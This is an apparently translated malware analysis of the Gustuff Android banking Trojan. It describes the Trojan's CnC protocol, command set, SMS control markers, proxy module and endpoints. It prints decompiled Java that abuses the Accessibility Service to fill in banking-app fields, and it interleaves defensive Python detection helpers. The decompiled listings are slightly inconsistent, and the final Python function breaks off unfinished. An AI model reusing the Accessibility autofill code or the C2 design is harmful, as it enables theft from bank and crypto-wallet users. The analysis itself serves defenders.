How the Gustuff Android Trojan skims the cream (fiat and crypto) from your accounts


The other day Group-IB reported on the activity of the Android Trojan Gustuff. It operates exclusively in international markets, attacking customers of the 100 largest foreign banks, users of 32 mobile crypto wallets, and major e-commerce resources. The author of Gustuff, however, is a Russian-speaking cybercriminal operating under the nickname Bestoffer. Until recently he advertised his Trojan as "a serious product for people with knowledge and experience."

Ivan Pisarev, a malware analysis specialist at Group-IB, described in detail in his research how Gustuff works and what makes it dangerous.

Who is Gustuff hunting?

Gustuff belongs to a new generation of malware with fully automated functions. According to its author, the Trojan is a new and improved version of the AndyBot malware, which since November 2017 has been attacking Android phones and stealing money through phishing web forms disguised as the mobile applications of well-known international banks and payment systems. Bestoffer reported that renting Gustuff Bot costs $800 per month.

Analysis of a Gustuff sample showed that the Trojan can potentially target customers using the mobile applications of the largest banks, such as Bank of America, Bank of Scotland, JPMorgan, Wells Fargo, Capital One, TD Bank and PNC Bank, and the crypto wallets Bitcoin Wallet, BitPay, Cryptopay, Coinbase and others.

Originally created as a classic banking Trojan, Gustuff in its current version has significantly expanded its list of potential targets. In addition to Android applications for banks, fintech companies and crypto services, Gustuff targets users of marketplace applications, online stores, payment systems and instant messengers. In particular: PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut and others.

Entry point: built for mass infection

Gustuff uses the "classic" vector for penetrating Android smartphones: SMS mailings with links to APKs. Once an Android device is infected with the Trojan, on command from the server Gustuff can spread further through the contact database of the infected phone or through the server's database. Gustuff's functionality is designed for mass infection and for maximum capitalization of its operators' business: it has a unique "autofill" function for legitimate mobile banking applications and crypto wallets, which allows theft of funds to be accelerated and scaled.

Analysis of the Trojan showed that the autofill function is implemented using the Accessibility Service, a service intended for people with disabilities. Gustuff is not the first Trojan to successfully bypass the protection against interacting with the window elements of other applications by abusing this Android service. However, the use of the Accessibility Service combined with an autofill engine is still relatively rare.

After being downloaded onto the victim's phone, Gustuff, using the Accessibility Service, is able to interact with the window elements of other applications (banking, cryptocurrency, online shopping, messaging and so on), performing the actions the attackers need. For example, on command from the server, the Trojan can press buttons and change the values of text fields in a banking application. Using the Accessibility Service mechanism lets the Trojan bypass the security mechanisms banks use against the previous generation of mobile Trojans, as well as the security policy changes Google introduces in new versions of the Android OS. Gustuff also "knows how" to disable Google Protect: according to the author, this function works in 70% of cases.


Gustuff can also display fake PUSH notifications bearing the icons of legitimate mobile applications. The user taps the PUSH notification and sees a phishing window downloaded from the server, where they enter the requested bank card or crypto wallet details. In another Gustuff scenario, the application on whose behalf the PUSH notification was shown is opened. In this case the malware, on command from the server and via the Accessibility Service, can fill in the fields of the banking application for a fraudulent transaction.

Gustuff's functionality also includes sending information about the infected device to the server, reading and sending SMS messages, sending USSD requests, launching a SOCKS5 proxy, following a link, sending files (including photo scans of documents, screenshots and photos) to the server, and resetting the device to factory settings.

Malware Analysis

Before the malicious application is installed, the Android OS shows the user a window containing the list of rights requested by Gustuff:

The application is installed only after the user gives consent. After the application is launched, the Trojan shows the user a window:

After that it removes its icon.

Gustuff is packed, according to its author, with the FTT packer. After starting, the application periodically contacts the CnC server to receive commands. Several of the files we examined used the IP address 88.99.171[.]105 as the control server (hereafter denoted <%CnC%>).

After launch, the program starts sending messages to the server at http://<%CnC%>/api/v1/get.php.

The response is expected to be JSON in the following format:

{
    "results" : "OK",
    "command":{
        "id": "<%id%>",
        "command":"<%command%>",
        "timestamp":"<%Server Timestamp%>",
        "params":{
		<%Command parameters as JSON%>
        },
    },
}

Every time the application is started, it sends information about the infected device. The message format is shown below. Note that the fields full, extra, apps and permission are optional and are sent only when a corresponding request command arrives from the CnC.

{
    "info":
    {
        "info":
        {
            "cell":<%Sim operator name%>,
            "country":<%Country ISO%>,
            "imei":<%IMEI%>,
            "number":<%Phone number%>,
            "line1Number":<%Phone number%>,
            "advertisementId":<%ID%>
        },
        "state":
        {
            "admin":<%Has admin rights%>,
            "source":<%String%>,
            "needPermissions":<%Application needs permissions%>,
            "accesByName":<%Boolean%>,
            "accesByService":<%Boolean%>,
            "safetyNet":<%String%>,
            "defaultSmsApp":<%Default Sms Application%>,
            "isDefaultSmsApp":<%Current application is Default Sms Application%>,
            "dateTime":<%Current date time%>,
            "batteryLevel":<%Battery level%>
        },
        "socks":
        {
            "id":<%Proxy module ID%>,
            "enabled":<%Is enabled%>,
            "active":<%Is active%>
        },
        "version":
        {
            "versionName":<%Package Version Name%>,
            "versionCode":<%Package Version Code%>,
            "lastUpdateTime":<%Package Last Update Time%>,
            "tag":<%Tag, default value: "TAG"%>,
            "targetSdkVersion":<%Target Sdk Version%>,
            "buildConfigTimestamp":1541309066721
        },
    },
    "full":
    {
        "model":<%Device Model%>,
        "localeCountry":<%Country%>,
        "localeLang":<%Locale language%>,
        "accounts":<%JSON array, contains from "name" and "type" of accounts%>,
        "lockType":<%Type of lockscreen password%>
    },
    "extra":
    {
        "serial":<%Build serial number%>,
        "board":<%Build Board%>,
        "brand":<%Build Brand%>,
        "user":<%Build User%>,
        "device":<%Build Device%>,
        "display":<%Build Display%>,
        "id":<%Build ID%>,
        "manufacturer":<%Build manufacturer%>,
        "model":<%Build model%>,
        "product":<%Build product%>,
        "tags":<%Build tags%>,
        "type":<%Build type%>,
        "imei":<%imei%>,
        "imsi":<%imsi%>,
        "line1number":<%phonenumber%>,
        "iccid":<%Sim serial number%>,
        "mcc":<%Mobile country code of operator%>,
        "mnc":<%Mobile network codeof operator%>,
        "cellid":<%GSM-data%>,
        "lac":<%GSM-data%>,
        "androidid":<%Android Id%>,
        "ssid":<%Wi-Fi SSID%>
    },
    "apps":{<%List of installed applications%>},
    "permission":<%List of granted permissions%>
} 

Storing configuration data

Gustuff stores its important operational data in a preferences file. The name of the file, as well as the names of the parameters in it, are the result of computing the MD5 sum of the string 15413090667214.6.1<%name%>, where <%name%> is the original name of the value. A Python interpretation of the name-generation function:

import hashlib

def nameGenerator(input):
    # MD5 of the fixed prefix followed by the original name, returned as a hex string
    return hashlib.md5(("15413090667214.6.1" + input).encode("utf-8")).hexdigest()

In what follows we denote it as nameGenerator(input).
So the name of the preferences file is nameGenerator("API_SERVER_LIST"), and it contains values with the following names:

Variable name | Meaning
nameGenerator("API_SERVER_LIST") | Contains the list of CnC addresses as an array.
nameGenerator("API_SERVER_URL") | Contains the CnC address.
nameGenerator("SMS_UPLOAD") | Flag, set by default. If the flag is set, SMS messages are sent to the CnC.
nameGenerator("SMS_ROOT_NUMBER") | Phone number to which SMS messages received by the infected device are sent. Empty by default.
nameGenerator("SMS_ROOT_NUMBER_RESEND") | Flag, cleared by default. If set, an SMS received by the infected device is forwarded to the root number.
nameGenerator("DEFAULT_APP_SMS") | Flag, cleared by default. If this flag is set, the application processes incoming SMS messages.
nameGenerator("DEFAULT_ADMIN") | Flag, cleared by default. If the flag is set, the application has administrator rights.
nameGenerator("DEFAULT_ACCESSIBILITY") | Flag, cleared by default. If the flag is set, the service that uses the Accessibility Service is running.
nameGenerator("APPS_CONFIG") | JSON object containing the list of actions to perform when an Accessibility event associated with a specific application fires.
nameGenerator("APPS_INSTALLED") | Stores the list of applications installed on the device.
nameGenerator("IS_FIST_RUN") | Flag reset on the first launch.
nameGenerator("UNIQUE_ID") | Contains a unique identifier. Created when the bot is launched for the first time.
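As an added illustration (not code from the article or from Group-IB), the Python below applies the naming scheme just described to the documented key list to build a reverse lookup, so an analyst who dumps a suspicious app's shared preferences can map the hashed names back to readable keys. It assumes the hash is the lowercase hex MD5 digest of the UTF-8 string; the sample preferences dump is constructed.

```python
import hashlib

# Preference keys documented in the article; the MD5 naming scheme is the one it describes.
GUSTUFF_PREF_KEYS = [
    "API_SERVER_LIST", "API_SERVER_URL", "SMS_UPLOAD", "SMS_ROOT_NUMBER",
    "SMS_ROOT_NUMBER_RESEND", "DEFAULT_APP_SMS", "DEFAULT_ADMIN",
    "DEFAULT_ACCESSIBILITY", "APPS_CONFIG", "APPS_INSTALLED", "IS_FIST_RUN",
    "UNIQUE_ID",
]
SALT = "15413090667214.6.1"


def name_generator(name: str) -> str:
    """MD5 of the fixed prefix followed by the original key name (assumed: lowercase hex, UTF-8)."""
    return hashlib.md5((SALT + name).encode("utf-8")).hexdigest()


def build_lookup(keys=GUSTUFF_PREF_KEYS) -> dict:
    """Map each hashed name back to its readable key for decoding a dumped preferences file."""
    return {name_generator(k): k for k in keys}


def resolve_prefs(raw_prefs: dict, lookup: dict = None) -> dict:
    """Translate {hashed_name: value} (e.g. parsed from shared_prefs XML) into readable keys.
    Names that are not in the lookup are kept unchanged so nothing is silently dropped."""
    lookup = lookup if lookup is not None else build_lookup()
    return {lookup.get(k, k): v for k, v in raw_prefs.items()}


# Constructed sample: a preferences dump as it would look after parsing the XML (values are made up).
SAMPLE_DUMP = {
    name_generator("API_SERVER_URL"): "http://<%CnC%>",
    name_generator("SMS_UPLOAD"): "true",
    "deadbeef" * 4: "unrelated-value",
}

if __name__ == "__main__":
    for key, value in resolve_prefs(SAMPLE_DUMP).items():
        print(f"{key} = {value}")
```

Because the salt is fixed, the lookup can be precomputed once and shipped with a forensic triage script; any preference file whose entry names all appear in the table is a strong indicator for this family.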

Module for processing commands from the server

The application stores the addresses of the CnC servers as an array of Base85-encoded strings. The list of CnC servers can be changed after the corresponding command is received, in which case the addresses are saved in the preferences file.

In response to the request, the server sends a command to the application. Note that commands and their parameters are presented in JSON format. The application can process the following commands:

Command | Description
forwardStart | Start sending SMS messages received by the infected device to the CnC server.
forwardStop | Stop sending SMS messages received by the infected device to the CnC server.
ussdRun | Execute a USSD request. The number for which the USSD request is made is in the JSON field "number".
sendSms | Send a single SMS message (if necessary, the message is "split" into parts). As a parameter the command takes a JSON object containing the fields "to" (destination number) and "body" (message body).
sendSmsAb | Send SMS messages (split into parts if necessary) to everyone in the infected device's contact list. The interval between messages is 10 seconds. The message body is in the JSON field "body".
sendSmsMass | Send SMS messages (split into parts if necessary) to the numbers specified in the command parameters. The interval between messages is 10 seconds. As a parameter the command takes a JSON array (field "sms") whose elements contain the fields "to" (destination number) and "body" (message body).
changeServer | This command can take as a parameter a value with the key "url", in which case the bot changes the value of nameGenerator("SERVER_URL"), or "array", in which case the bot writes the array to nameGenerator("API_SERVER_LIST"). In this way the application changes the CnC server address.
adminNumber | The command is intended for working with the root number. It accepts a JSON object with the following parameters: "number" sets nameGenerator("ROOT_NUMBER") to the received value, "resend" changes nameGenerator("SMS_ROOT_NUMBER_RESEND"), "sendId" sends the unique ID to nameGenerator("ROOT_NUMBER").
updateInfo | Send information about the infected device to the server.
wipeData | The command is intended for deleting user data. Depending on the name under which the application was launched, either the data is wiped completely and the device reboots (primary user), or only the user's data is deleted (secondary user).
socksStart | Launch the Proxy module. The module's operation is described in a separate section.
socksStop | Stop the Proxy module.
openLink | Follow a link. The link is in the JSON parameter under the key "url". "android.intent.action.VIEW" is used to open it.
uploadAllSms | Send all SMS messages received by the device to the server.
uploadAllPhotos | Send images from the infected device to a URL. The URL comes as a parameter.
uploadFile | Send a file from the infected device to a URL. The URL comes as a parameter.
uploadPhoneNumbers | Send phone numbers from the contact list to the server. If a JSON object with the key "ab" is received as a parameter, the application takes the contact list from the phone book. If a JSON object with the key "sms" is received, the application reads the contact list from the senders of SMS messages.
changeArchive | The application downloads a file from the address that comes as a parameter under the key "url". The downloaded file is saved as "archive.zip". The application then unpacks the archive, using the password "b5jXh37gxgHBrZhQ4j3D" if required. The unpacked files are stored in the [external storage]/hgps directory. This is the directory in which the application keeps its web fakes (described below).
actions | The command is intended for working with the Action Service, described in a separate section.
test | Does nothing.
download | The command is intended for downloading a file from a remote server and saving it to the "Downloads" directory. The URL and the file name come as parameters, in the fields "url" and "fileName" of the JSON parameter object respectively.
remove | Removes a file from the "Downloads" directory. The file name comes in the JSON parameter under the key "fileName". The default file name is "tmp.apk".
notification | Show a notification whose description and title text are defined by the control server.

Format of the notification command:

{
    "results" : "OK",
    "command":{
        "id": <%id%>,
        "command":"notification",
        "timestamp":<%Server Timestamp%>,
        "params":{
            "openApp":<%Open original app or not%>,
            "array":[
                {"title":<%Title text%>,
                 "desc":<%Description text%>,
                 "app":<%Application name%>}
            ]
        },
    },
}

The notification shown by the file under investigation looks like a notification generated by the application specified in the app field. If the value of the openApp field is True, opening the notification launches the application specified in the app field. If the value of the openApp field is False, then:

  • A phishing window opens whose content is loaded from the directory <%external storage%>/hgps/<%filename%>
  • A phishing window opens whose content is loaded from the server at <%url%>?id=<%Bot id%>&app=<%Application name%>
  • A phishing window imitating a Google Play card opens, offering to enter card details.

The application sends the result of each command to <%CnC%>set_state.php as a JSON object in the following format:

{
    "command":
    {
        "command":<%command%>,
        "id":<%command_id%>,
        "state":<%command_state%>
    },
    "id":<%bot_id%>
}

Action Service
The list of commands the application processes includes actions. When such a command is received, the command-processing module hands it to this service to execute the extended command. The service takes a JSON object as its parameter. The service can execute the following commands:

1. PARAMS_ACTION - on receiving such a command, the service first reads the value of the Type key from the JSON parameter, which can be one of the following:

  • serviceInfo - the subcommand reads the value of the key "includeNotImportant" from the JSON parameter. If the flag is true, the application sets the FLAG_ISOLATED_PROCESS flag on the service via the Accessibility Service, so that the service is launched in a separate process.
  • root - obtain and send to the server information about the window currently in focus. The application obtains the information using the AccessibilityNodeInfo class.
  • admin - request administrator rights.
  • delay - suspend the Action Service for the number of milliseconds specified in the parameter under the key "data".
  • windows - send the list of windows visible to the user.
  • install - install an application on the infected device. The archive package name is in the key "fileName". The archive itself is in the Downloads directory.
  • global - the subcommand is intended for navigating away from the current window:
    • to the Quick Settings menu
    • back
    • home
    • to notifications
    • to the recently opened applications window

  • launch - launch an application. The application name comes as a parameter under the key data.
  • sound - switch the sound mode to silent.
  • unlock - turns on the screen and keyboard backlight at full brightness. The application does this using a WakeLock, specifying the string [Application Label]:INFO as the tag.
  • permissionOverlay - function not implemented (the response to the command is {"message":"Not supported"} or {"message":"low sdk"})
  • gesture - function not implemented (the response to the command is {"message":"Not supported"} or {"message":"Low API"})
  • permissions - this command is meant to request permissions for the application. However, the requesting function is not implemented, so the command has no effect. The list of requested rights comes as a JSON array under the key "permissions". Default list:
    • android.permission.READ_PHONE_STATE
    • android.permission.READ_CONTACTS
    • android.permission.CALL_PHONE
    • android.permission.RECEIVE_SMS
    • android.permission.SEND_SMS
    • android.permission.READ_SMS
    • android.permission.READ_EXTERNAL_STORAGE
    • android.permission.WRITE_EXTERNAL_STORAGE

  • open - display a phishing window. Depending on the parameter that comes from the server, the application can display the following phishing windows:
    • A phishing window whose content is read from a file in the directory <%external storage%>/hgps/<%param_filename%>. The result of the user's interaction with the window is sent to <%CnC%>/records.php
    • A phishing window whose content is loaded in advance from the address <%url_param%>?id=<%bot_id%>&app=<%packagename%>. The result of the user's interaction with the window is sent to <%CnC%>/records.php
    • A phishing window imitating a Google Play card.

  • interactive - the command is intended for interacting with the window elements of other applications via the AccessibilityService. A dedicated service is implemented in the program for this interaction. The application under investigation can interact with windows that are:
    • Currently active. In this case the parameter contains the id or text (name) of the object to interact with.
    • Visible to the user at the moment the command is executed. The application selects windows by id.

    Having obtained the AccessibilityNodeInfo objects for the window elements of interest, the application, depending on the parameters, can perform the following actions on them:

    • focus - set focus on the object.
    • click - click on the object.
    • actionId - perform an action by its ID.
    • setText - change the object's text. The text can be changed in two ways: by performing the ACTION_SET_TEXT action (if the Android version of the infected device is LOLLIPOP or later), or by placing the string on the clipboard and pasting it into the object (for older versions). This command can be used to alter data in a banking application.

2. PARAMS_ACTIONS - the same as PARAMS_ACTION, except that a JSON array of commands arrives.

Many will probably be curious what the function for interacting with the window elements of another application looks like. This is how that functionality is implemented in Gustuff:

boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
    int repeat = action.optInt("repeat", 1);   // how many times to apply the action to each node
    Iterator aiListIterator = ((Iterable)aiList).iterator();
    int count = 0;                             // number of actions that succeeded
    while(aiListIterator.hasNext()) {
        Object ani = aiListIterator.next();
        if(1 <= repeat) {
            int index;
            for(index = 1; true; ++index) {
                if(action.has("focus")) {
                    if(((AccessibilityNodeInfo)ani).performAction(1)) {   // ACTION_FOCUS
                        ++count;
                    }
                }
                else if(action.has("click")) {
                    if(((AccessibilityNodeInfo)ani).performAction(16)) {  // ACTION_CLICK
                        ++count;
                    }
                }
                else if(action.has("actionId")) {
                    if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
                        ++count;
                    }
                }
                else if(action.has("setText")) {
                    customHeader ch = CustomAccessibilityService.a;
                    Context context = this.getApplicationContext();
                    String text = action.optString("setText");
                    if(performSetTextAction(ch, context, ((AccessibilityNodeInfo)ani), text)) {
                        ++count;
                    }
                }
                if(index == repeat) {
                    break;
                }
            }
        }
        ((AccessibilityNodeInfo)ani).recycle();
    }
    res.addPropertyNumber("res", Integer.valueOf(count));   // report how many actions succeeded
}

The text replacement function:

boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
    boolean result;
    if(Build$VERSION.SDK_INT >= 21) {
        Bundle b = new Bundle();
        b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
        result = ani.performAction(0x200000, b);  // ACTION_SET_TEXT
    }
    else {
        Object clipboard = context.getSystemService("clipboard");
        if(clipboard != null) {
            ((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
            result = ani.performAction(0x8000);  // ACTION_PASTE
        }
        else {
            result = false;
        }
    }
    return result;
}

Thus, with a correctly configured control server, Gustuff can fill in text fields in a banking application and press the buttons needed to complete a transaction. The Trojan does not even need to log in to the application: it is enough to send a command to display a PUSH notification and then open the previously installed banking application. The user authenticates themselves, after which Gustuff can perform the autofill.

SMS message processing module

The application installs an event handler for the infected device's incoming SMS messages. The application under analysis can receive commands from the operator in the body of an SMS message. Commands arrive in the format:

7!5=<%Base64-encoded command%>

The application searches all incoming SMS messages for the string 7!5=; when the string is found, it decodes the string from Base64 starting at offset 4 and executes the command. The commands are the same as those used with the CnC. The result of execution is sent back to the number the command came from. Response format:

7*5=<%Base64 encoding of "command result_code"%>
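The marker format above can be turned into a defender-side check. The following Python, added here and not part of the article, scans SMS bodies for the 7!5= and 7*5= markers and decodes the Base64 payload that starts at offset 4, treating an undecodable payload as a hit still worth flagging rather than as an error. The sample messages are constructed.

```python
import base64
import binascii

CMD_MARKER = "7!5="    # operator command carried in an inbound SMS
RESP_MARKER = "7*5="   # the bot's reply to the sending number
MARKER_LEN = 4         # the article: Base64 payload is decoded from offset 4


def classify_sms(body: str):
    """Return ("command" | "reply", decoded_text_or_None) when a marker is present, else None.
    A marker followed by unreadable Base64 is still reported (with None) so it is not lost."""
    for kind, marker in (("command", CMD_MARKER), ("reply", RESP_MARKER)):
        idx = body.find(marker)
        if idx < 0:
            continue
        payload = body[idx + MARKER_LEN:].strip()
        try:
            decoded = base64.b64decode(payload, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            decoded = None
        return kind, decoded
    return None


def scan_messages(bodies):
    """Run classify_sms over a list of SMS bodies; returns (index, kind, decoded) per hit."""
    hits = []
    for i, body in enumerate(bodies):
        result = classify_sms(body)
        if result is not None:
            hits.append((i, result[0], result[1]))
    return hits


def _b64(text: str) -> str:
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


# Constructed sample messages: one benign OTP, one command, one reply, one malformed command.
SAMPLE_SMS = [
    "Your verification code is 123456",
    CMD_MARKER + _b64("updateInfo"),
    RESP_MARKER + _b64("updateInfo 0"),
    CMD_MARKER + "!!!not-base64",
]

if __name__ == "__main__":
    for index, kind, decoded in scan_messages(SAMPLE_SMS):
        print(index, kind, decoded)
```

The literal markers are cheap to match in an SMS gateway or MDM log pipeline; decoding the payload lets the analyst see which documented command (for example updateInfo or sendSms) the operator issued.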

Optionally, the application can forward all received messages to the Root number. For this, the Root number must be specified in the preferences file and the message-forwarding flag must be set. SMS messages are sent to the attacker's number in the format:

<%From number%> - <%Time, format: dd/MM/yyyy HH:mm:ss%> <%SMS body%>

Also optionally, the application can send messages to the CnC. SMS messages are sent to the server in JSON format:

{
    "id":<%BotID%>,
    "sms":
    {
        "text":<%SMS body%>,
        "number":<%From number%>,
        "date":<%Timestamp%>
    }
}

If the nameGenerator("DEFAULT_APP_SMS") flag is set, the application stops processing the SMS message and clears the list of incoming messages.

Proxy module

The application under investigation contains a Backconnect Proxy module (hereafter the Proxy module), which has a separate class with static fields holding its configuration. The configuration data is stored in the sample in clear text:


All actions performed by the Proxy module are logged to files. For this, the application creates a directory named "logs" in External Storage (the ProxyConfigClass.logsDir field of the configuration class), in which the log files are stored. Logging goes to files with the following names:

  1. main.txt - the work of the class called CommandServer is logged to this file. In what follows, writing the string str to this file is denoted mainLog(str).
  2. session-<%id%>.txt - this file stores log data related to a specific proxy session. In what follows, writing a string to this file is denoted sessionLog(str).
  3. server.txt - this file is used to record all the data written to the files described above.

Log record format:

<%Date%> [Thread[<%thread id%>], id[]]: log-string

Exceptions that occur while the Proxy module is running are also written to the log. For this, the application generates a JSON object in the following format:

{
    "uncaughtException":<%short description of throwable%>
    "thread":<%thread%>
    "message":<%detail message of throwable%>
    "trace":        //Stack trace info
        [
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            },
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            }
        ]
}

It then converts it to its string representation and writes it out.

The Proxy module is launched after the corresponding command is received. When the command to launch the Proxy module arrives, the application starts a service called MainService, which is responsible for managing the Proxy module's operation: starting and stopping it.

Service start-up stages:

1. Start a timer that runs once a minute and checks whether the proxy module is active. If the module is not active, it starts it.
The proxy module is also launched when the android.net.conn.CONNECTIVITY_CHANGE event fires.

2. The application creates a wake lock with the PARTIAL_WAKE_LOCK parameter and acquires it. This prevents the device's CPU from entering sleep mode.

3. It launches the command-processing class of the Proxy module, first logging the lines mainLog("Starting server") and

Server::start() host[<%proxy_cnc%>], commandPort[<%command_port%>], proxyPort[<%proxy_port%>]

where proxy_cnc, command_port and proxy_port are parameters taken from the proxy server configuration.

The command-processing class is called CommandConnection. Immediately after starting, it performs the following actions:

4. Connects to ProxyConfigClass.host:ProxyConfigClass.commandPort and sends information about the infected device there in JSON format:

{
    "id":<%id%>,
    "imei":<%imei%>,
    "imsi":<%imsi%>,
    "model":<%model%>,
    "manufacturer":<%manufacturer%>,
    "androidVersion":<%androidVersion%>,
    "country":<%country%>,
    "partnerId":<%partnerId%>,
    "packageName":<%packageName%>,
    "networkType":<%networkType%>,
    "hasGsmSupport":<%hasGsmSupport%>,
    "simReady":<%simReady%>,
    "simCountry":<%simCountry%>,
    "networkOperator":<%networkOperator%>,
    "simOperator":<%simOperator%>,
    "version":<%version%>
}

Where:

  • id - identifier; the module tries to read the value of the field "id" from the Shared Preferences file named "x". If the value cannot be obtained, it generates a new one. Thus the Proxy module has its own identifier, generated in the same way as the Bot ID.
  • imei - the device's IMEI. If an error occurs while obtaining the value, the text of the error message is written in place of this field.
  • imsi - the device's International Mobile Subscriber Identity. If an error occurs while obtaining the value, the text of the error message is written in place of this field.
  • model - the end-user-visible name of the end product.
  • manufacturer - the manufacturer of the product/hardware (Build.MANUFACTURER).
  • androidVersion - a string in the format "<%release_version%> (<%os_version%>),<%sdk_version%>"
  • country - the device's current location.
  • partnerId - an empty string.
  • packageName - the package name.
  • networkType - the type of the current network connection (for example "WIFI", "MOBILE"). If an error occurs, null is returned.
  • hasGsmSupport - true if the phone supports GSM, otherwise false.
  • simReady - the state of the SIM card.
  • simCountry - ISO country code (based on the SIM card provider).
  • networkOperator - the operator name. If an error occurs while obtaining the value, the text of the error message is written in place of this field.
  • simOperator - the Service Provider Name (SPN). If an error occurs while obtaining the value, the text of the error message is written in place of this field.
  • version - this field is stored in the configuration class; for the bot versions tested it equals "1.6".

5. Switches to waiting for commands from the server. Commands from the server arrive in the format:

  • offset 0 - command
  • offset 1 - sessionId
  • offset 2 - length
  • offset 4 - data

When a command arrives, the application logs:
mainLog("Header { sessionId<%id%>], type[<%command%>], length[<%length%>] })

The following commands from the server are possible:

Name | Command | Data | Description
connectionId | 0 | connection ID | Create a new connection
SLEEP | 3 | time | Suspend the proxy module
PING_PONG | 4 | - | Send a PONG message

The PONG message consists of 4 bytes and looks like this: 0x04000000.
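As an added example, not part of the article, here is a Python parser for the control-channel framing described above (command at offset 0, sessionId at offset 1, length at offset 2, data from offset 4), which also builds the 0x04000000 PONG. The byte order of the 2-byte length is not stated on the page; little-endian is assumed here, and the sample byte stream is constructed.

```python
import struct

# Command codes documented for the Proxy module's control channel.
CMD_CONNECTION_ID = 0
CMD_SLEEP = 3
CMD_PING_PONG = 4
COMMAND_NAMES = {CMD_CONNECTION_ID: "connectionId", CMD_SLEEP: "SLEEP", CMD_PING_PONG: "PING_PONG"}

# command (1 byte) + sessionId (1 byte) + length (2 bytes); little-endian length is an assumption.
HEADER_FMT = "<BBH"
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 4, so data starts at offset 4 as the article states


def parse_frame(buf: bytes):
    """Parse one frame from the front of buf.
    Returns (command, session_id, data, remaining) or None if the buffer holds an incomplete frame."""
    if len(buf) < HEADER_LEN:
        return None
    command, session_id, length = struct.unpack_from(HEADER_FMT, buf, 0)
    end = HEADER_LEN + length
    if len(buf) < end:
        return None
    return command, session_id, bytes(buf[HEADER_LEN:end]), bytes(buf[end:])


def parse_stream(buf: bytes):
    """Split a captured byte stream into (command_name, session_id, data) tuples, stopping at a partial frame."""
    frames = []
    while buf:
        parsed = parse_frame(buf)
        if parsed is None:
            break
        command, session_id, data, buf = parsed
        frames.append((COMMAND_NAMES.get(command, "unknown(%d)" % command), session_id, data))
    return frames


def build_pong() -> bytes:
    """The 4-byte PONG: command 4, session 0, zero length, which serialises to 04 00 00 00."""
    return struct.pack(HEADER_FMT, CMD_PING_PONG, 0, 0)


# Constructed sample stream: a PONG, a connectionId frame with 4 data bytes, then a truncated SLEEP header.
SAMPLE_STREAM = (
    bytes([0x04, 0x00, 0x00, 0x00])
    + bytes([0x00, 0x01, 0x04, 0x00]) + bytes([0x2A, 0x00, 0x00, 0x00])
    + bytes([0x03, 0x01, 0x02])
)

if __name__ == "__main__":
    for name, session_id, data in parse_stream(SAMPLE_STREAM):
        print(name, session_id, data.hex())
```

A parser like this is the starting point for a network signature: a fixed 4-byte header with a one-byte command in the documented range and a bare 04 00 00 00 keep-alive is distinctive enough to be matched in a TCP stream.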

When the connectionId command (to create a new connection) is received, CommandConnection creates an instance of the ProxyConnection class.

  • Two classes take part in proxying: ProxyConnection and end. When the ProxyConnection class is created, a connection is made to the address ProxyConfigClass.host:ProxyConfigClass.proxyPort and a JSON object is passed:

 {
    "id":<%connectionId%>
}

In response, the server sends a SOCKS5 message containing the address of the remote server with which a connection must be established. Interaction with that server takes place through the end class. The connection setup can be represented schematically as follows:


Network communication

To hinder traffic analysis by network sniffers, the interaction between the CnC server and the application can be protected with SSL. All data transmitted to and from the server is presented in JSON format. The application makes the following requests during operation:

  • http://<%CnC%>/api/v1/set_state.php - the result of command execution.
  • http://<%CnC%>/api/v1/get.php - receiving a command.
  • http://<%CnC%>/api/v1/load_sms.php - uploading SMS messages from the infected device.
  • http://<%CnC%>/api/v1/load_ab.php - uploading the contact list from the infected device.
  • http://<%CnC%>/api/v1/aevents.php - the request is made when the parameters in the preferences file are updated.
  • http://<%CnC%>/api/v1/set_card.php - uploading data obtained through the phishing window imitating the Google Play Market.
  • http://<%CnC%>/api/v1/logs.php - uploading log data.
  • http://<%CnC%>/api/v1/records.php - uploading data obtained through phishing windows.
  • http://<%CnC%>/api/v1/set_error.php - notification of an error that occurred.
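To turn this endpoint list into a detection, the Python below (an added example, not Group-IB's code) parses constructed proxy log lines and reports clients that contacted at least two of the documented /api/v1/*.php paths on the same host; a single hit on a generic path such as /api/v1/get.php is too weak to alert on by itself. The log format, client addresses and hosts are all constructed.

```python
import re
from urllib.parse import urlsplit

# Endpoint paths documented in the article (relative to the CnC host).
GUSTUFF_ENDPOINTS = {
    "/api/v1/set_state.php", "/api/v1/get.php", "/api/v1/load_sms.php",
    "/api/v1/load_ab.php", "/api/v1/aevents.php", "/api/v1/set_card.php",
    "/api/v1/logs.php", "/api/v1/records.php", "/api/v1/set_error.php",
}

# Constructed proxy log: "<timestamp> <client_ip> <method> <url> <status>" (203.0.113.0/24 is TEST-NET).
SAMPLE_LOG = """\
2019-03-28T10:01:02Z 10.0.0.5 POST http://203.0.113.10/api/v1/get.php 200
2019-03-28T10:01:05Z 10.0.0.5 POST http://203.0.113.10/api/v1/set_state.php 200
2019-03-28T10:02:00Z 10.0.0.7 GET https://example.com/api/v1/get.php?x=1 200
2019-03-28T10:03:00Z 10.0.0.9 GET https://example.com/index.html 200
2019-03-28T10:04:00Z 10.0.0.5 POST http://203.0.113.10/api/v1/records.php 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d+)$")


def parse_line(line: str):
    """Split one log line into its fields; returns None for lines that do not match the format."""
    match = LINE_RE.match(line)
    if not match:
        return None
    ts, client, method, url, status = match.groups()
    return {"ts": ts, "client": client, "method": method, "url": url, "status": int(status)}


def matched_endpoint(url: str):
    """Return the documented endpoint path if the URL's path is one of them, else None."""
    path = urlsplit(url).path
    return path if path in GUSTUFF_ENDPOINTS else None


def find_suspects(log_text: str, min_distinct: int = 2) -> dict:
    """Group endpoint hits by (client, host) and keep pairs with at least min_distinct distinct endpoints."""
    hits = {}
    for line in log_text.splitlines():
        record = parse_line(line)
        if record is None:
            continue
        endpoint = matched_endpoint(record["url"])
        if endpoint is None:
            continue
        host = urlsplit(record["url"]).netloc
        hits.setdefault((record["client"], host), set()).add(endpoint)
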